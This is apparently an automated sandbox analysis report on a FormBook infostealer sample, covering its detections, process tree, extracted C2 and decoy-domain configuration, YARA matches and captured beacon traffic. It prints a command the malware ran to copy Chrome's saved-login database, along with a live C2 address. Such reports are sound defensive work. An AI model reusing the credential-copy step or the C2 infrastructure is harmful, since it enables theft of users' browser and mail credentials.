Play interactive tour

Edit tour

Analysis Report focus.com

Overview

General Information

Sample Name:	focus.com (renamed file extension from com to exe)
Analysis ID:	412792
MD5:	5e5cc661beb832b718df6b68d16c0165
SHA1:	af146998a35d9a76b9969b85811d19b2a5cd21a9
SHA256:	bf07af9d0e95551d5599a2c1145adc2fb24595e8451c1340b91969f8577cd212
Tags:	com
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected FormBook malware

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

PE file has a writeable .text section

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file access)

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

focus.exe (PID: 3176 cmdline: 'C:\Users\user\Desktop\focus.exe' MD5: 5E5CC661BEB832B718DF6B68D16C0165)

player-toolkit.exe (PID: 2588 cmdline: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe MD5: 1844A4E542EEAC121065EA23B0F1D6B3)

explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

autochk.exe (PID: 2428 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 34236DB574405291498BCD13D20C42EB)

wscript.exe (PID: 1956 cmdline: C:\Windows\SysWOW64\wscript.exe MD5: 7075DD7B9BE8807FCA93ACD86F724884)

cmd.exe (PID: 404 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

player-toolkit.exe (PID: 5216 cmdline: 'C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe' MD5: 1844A4E542EEAC121065EA23B0F1D6B3)

player-toolkit.exe (PID: 5452 cmdline: 'C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe' MD5: 1844A4E542EEAC121065EA23B0F1D6B3)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.hollandhousedesigns.design/vns/"], "decoy": ["sparkspressworld.com", "everydayresidency.com", "thebosscollectionn.com", "milkweedmagic.com", "worklesshours.com", "romeosfurnituremadera.com", "unclepetesproduce.com", "athleticamackay.com", "9nhl.com", "powellassetmanagement.com", "jxlamp.com", "onpointpetproducts.com", "buymysoft.com", "nazertrader.com", "goprj.com", "keeptalkservice.com", "aolei1688.com", "donstackl.com", "almasorchids.com", "pj5bwn.com", "featuredshop2020.com", "connectmheduaction.com", "kcastleint.com", "quintessentialmiss.com", "forenvid.com", "vetementsbd.com", "fabrizioamadori.net", "remaxplatinumva.com", "drivecart.net", "ordertds.com", "huayuanjiajiao.com", "islamiportal.com", "innergardenhealing.space", "wlwmwntor.com", "wiitendo.com", "ceschandigarh.com", "mitchellche.com", "levaporz.com", "eraophthalmica.com", "gnzywyht.com", "bobbinsbroider.com", "pollygen.com", "xn--kbrsotocheckup-5fcc.com", "theunprofessionalpodcast.com", "lendini.site", "digitalpardis.com", "meenaveen.com", "yihuafence.com", "mercadoaria.com", "domennyarendi44.net", "juandiegopalacio.com", "meltdownfitnesstulsa.com", "xn--laclnicadelvnculo-gvbi.com", "paripartners378.com", "valadecia.com", "womenring.com", "ocarlosresolve.com", "vedicherbsindia.com", "nonnearrapate.com", "viplending.net", "angelbeatsgamingclan.com", "rigmodisc.com", "page-id-78613.com", "yapadaihindi.com"]}

Yara Overview

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\RadioBOSSAssembly\instructions.pdf	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
C:\Users\user\AppData\Roaming\RadioBOSSAssembly\instructions.pdf	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x10157:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x103c1:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1c09f:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1bb8b:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1c1a1:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1c319:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x10dd9:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1ae06:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x11ad2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x21d41:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x22de0:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
C:\Users\user\AppData\Roaming\RadioBOSSAssembly\instructions.pdf	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1ee23:$sqlite3step: 68 34 1C 7B E1 0x1ef36:$sqlite3step: 68 34 1C 7B E1 0x1ee52:$sqlite3text: 68 38 2A 90 C5 0x1ef77:$sqlite3text: 68 38 2A 90 C5 0x1ee65:$sqlite3blob: 68 53 D8 7F 8C 0x1ef8d:$sqlite3blob: 68 53 D8 7F 8C

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x88e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x956a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x173f9:$sqlite3step: 68 34 1C 7B E1 0x1750c:$sqlite3step: 68 34 1C 7B E1 0x17428:$sqlite3text: 68 38 2A 90 C5 0x1754d:$sqlite3text: 68 38 2A 90 C5 0x1743b:$sqlite3blob: 68 53 D8 7F 8C 0x17563:$sqlite3blob: 68 53 D8 7F 8C
00000018.00000002.462752725.0000000002BA0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000018.00000002.462752725.0000000002BA0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000018.00000002.462752725.0000000002BA0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.358392198.0000000000900000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.358392198.0000000000900000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.358392198.0000000000900000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.358594284.000000000246F000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.358594284.000000000246F000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x10177:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x103e1:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x6864a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x688b4:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1c0bf:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x743d7:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1bbab:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x73ec3:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1c1c1:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x744d9:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1c339:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x74651:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x10df9:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x692cc:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1ae26:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x7313e:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x11af2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x69fc5:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x21d61:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x7a079:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x22e00:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.358594284.000000000246F000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1ee43:$sqlite3step: 68 34 1C 7B E1 0x1ef56:$sqlite3step: 68 34 1C 7B E1 0x7715b:$sqlite3step: 68 34 1C 7B E1 0x7726e:$sqlite3step: 68 34 1C 7B E1 0x1ee72:$sqlite3text: 68 38 2A 90 C5 0x1ef97:$sqlite3text: 68 38 2A 90 C5 0x7718a:$sqlite3text: 68 38 2A 90 C5 0x772af:$sqlite3text: 68 38 2A 90 C5 0x1ee85:$sqlite3blob: 68 53 D8 7F 8C 0x1efad:$sqlite3blob: 68 53 D8 7F 8C 0x7719d:$sqlite3blob: 68 53 D8 7F 8C 0x772c5:$sqlite3blob: 68 53 D8 7F 8C
00000018.00000002.462668066.0000000002B70000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000018.00000002.462668066.0000000002B70000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000018.00000002.462668066.0000000002B70000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.358429891.0000000000A60000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.358429891.0000000000A60000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.358429891.0000000000A60000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 16 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.player-toolkit.exe.10000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.player-toolkit.exe.10000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.player-toolkit.exe.10000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x175f9:$sqlite3step: 68 34 1C 7B E1 0x1770c:$sqlite3step: 68 34 1C 7B E1 0x17628:$sqlite3text: 68 38 2A 90 C5 0x1774d:$sqlite3text: 68 38 2A 90 C5 0x1763b:$sqlite3blob: 68 53 D8 7F 8C 0x17763:$sqlite3blob: 68 53 D8 7F 8C

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://www.forenvid.com/vns/	Avira URL Cloud: Label: malware
Source: http://www.forenvid.com	Avira URL Cloud: Label: malware
Source: http://www.forenvid.com/vns/www.thebosscollectionn.com	Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.hollandhousedesigns.design/vns/"], "decoy": ["sparkspressworld.com", "everydayresidency.com", "thebosscollectionn.com", "milkweedmagic.com", "worklesshours.com", "romeosfurnituremadera.com", "unclepetesproduce.com", "athleticamackay.com", "9nhl.com", "powellassetmanagement.com", "jxlamp.com", "onpointpetproducts.com", "buymysoft.com", "nazertrader.com", "goprj.com", "keeptalkservice.com", "aolei1688.com", "donstackl.com", "almasorchids.com", "pj5bwn.com", "featuredshop2020.com", "connectmheduaction.com", "kcastleint.com", "quintessentialmiss.com", "forenvid.com", "vetementsbd.com", "fabrizioamadori.net", "remaxplatinumva.com", "drivecart.net", "ordertds.com", "huayuanjiajiao.com", "islamiportal.com", "innergardenhealing.space", "wlwmwntor.com", "wiitendo.com", "ceschandigarh.com", "mitchellche.com", "levaporz.com", "eraophthalmica.com", "gnzywyht.com", "bobbinsbroider.com", "pollygen.com", "xn--kbrsotocheckup-5fcc.com", "theunprofessionalpodcast.com", "lendini.site", "digitalpardis.com", "meenaveen.com", "yihuafence.com", "mercadoaria.com", "domennyarendi44.net", "juandiegopalacio.com", "meltdownfitnesstulsa.com", "xn--laclnicadelvnculo-gvbi.com", "paripartners378.com", "valadecia.com", "womenring.com", "ocarlosresolve.com", "vedicherbsindia.com", "nonnearrapate.com", "viplending.net", "angelbeatsgamingclan.com", "rigmodisc.com", "page-id-78613.com", "yapadaihindi.com"]}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\libdisplay4-1.dll	Metadefender: Detection: 20%	Perma Link
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\libdisplay4-1.dll	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Metadefender: Detection: 26%	Perma Link
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	ReversingLabs: Detection: 68%

Multi AV Scanner detection for submitted file

Show sources

Source: focus.exe	Virustotal: Detection: 68%	Perma Link
Source: focus.exe	Metadefender: Detection: 26%	Perma Link
Source: focus.exe	ReversingLabs: Detection: 89%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.462752725.0000000002BA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.358392198.0000000000900000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.358594284.000000000246F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.462668066.0000000002B70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.358429891.0000000000A60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\instructions.pdf, type: DROPPED
Source: Yara match	File source: 2.2.player-toolkit.exe.10000.0.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe

Joe Sandbox ML: detected

Source: 2.2.player-toolkit.exe.10000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_00014C60 BCryptOpenAlgorithmProvider,BCryptGenRandom,BCryptCloseAlgorithmProvider,	29_2_00014C60
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E584EA0 MultiByteToWideChar,MultiByteToWideChar,CryptAcquireContextW,CryptReleaseContext,GetLastError,	32_2_6E584EA0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E585B30 CryptAcquireContextW,GetLastError,CryptGetUserKey,CryptReleaseContext,	32_2_6E585B30
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E586950 MultiByteToWideChar,MultiByteToWideChar,GetLastError,CryptAcquireContextW,CryptGetProvParam,GetLastError,CryptReleaseContext,CryptGetProvParam,GetLastError,CryptReleaseContext,	32_2_6E586950

Source: focus.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\focus.exe

File created: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\ReadMe.txt

Jump to behavior

Source: focus.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wscript.pdbGCTL source: player-toolkit.exe, 00000002.00000003.357830256.0000000000B24000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000013.00000000.345964478.000000000E1C0000.00000002.00000001.sdmp
Source:	Binary string: C:\workdir\build\Release_TS\IDMBrBtn\icu4c-57_1-src\obj\win3.pdb source: player-toolkit.exe, 00000002.00000002.358140994.0000000000164000.00000002.00020000.sdmp, wscript.exe, 00000018.00000002.463956730.00000000049EC000.00000004.00000001.sdmp, player-toolkit.exe, 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp, player-toolkit.exe, 00000020.00000000.426742087.0000000000164000.00000002.00020000.sdmp, player-toolkit.exe.0.dr
Source:	Binary string: D:\winx64-packages\Release\Release\PotPlayer\obj\Vi.pdb source: player-toolkit.exe, 00000002.00000002.359142610.000000006E4D6000.00000002.00020000.sdmp, player-toolkit.exe, 0000001D.00000002.464579995.000000006E616000.00000002.00020000.sdmp, player-toolkit.exe, 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp, libdisplay4-1.dll.0.dr
Source:	Binary string: wntdll.pdbUGP source: player-toolkit.exe, 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp, wscript.exe, 00000018.00000002.464600721.0000000004AD0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: player-toolkit.exe, wscript.exe
Source:	Binary string: wscript.pdb source: player-toolkit.exe, 00000002.00000003.357830256.0000000000B24000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000013.00000000.345964478.000000000E1C0000.00000002.00000001.sdmp

Source: C:\Users\user\Desktop\focus.exe	Code function: 0_2_0040646B FindFirstFileA,FindClose,	0_2_0040646B
Source: C:\Users\user\Desktop\focus.exe	Code function: 0_2_004027A1 FindFirstFileA,	0_2_004027A1
Source: C:\Users\user\Desktop\focus.exe	Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_004058BF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E56CD40 MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,FindFirstFileW,FindNextFileW,WideCharToMultiByte,	32_2_6E56CD40
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E5490FC FindFirstFileExW,	32_2_6E5490FC

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 4x nop then pop esi		2_2_000272CF
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4x nop then pop esi		24_2_003E72CF

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.hollandhousedesigns.design/vns/

Source: global traffic

HTTP traffic detected: GET /vns/?BlP=7+ZKUnh4u9UMtKwB98gwx/ZO0djsvR0w/TFw058Z3BgI+IMtx40n++NUyS4P23cT16Wd&vFNL=UFNx8bfpixDd HTTP/1.1Host: www.ordertds.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

ASN Name: RACKSPACEUS RACKSPACEUS

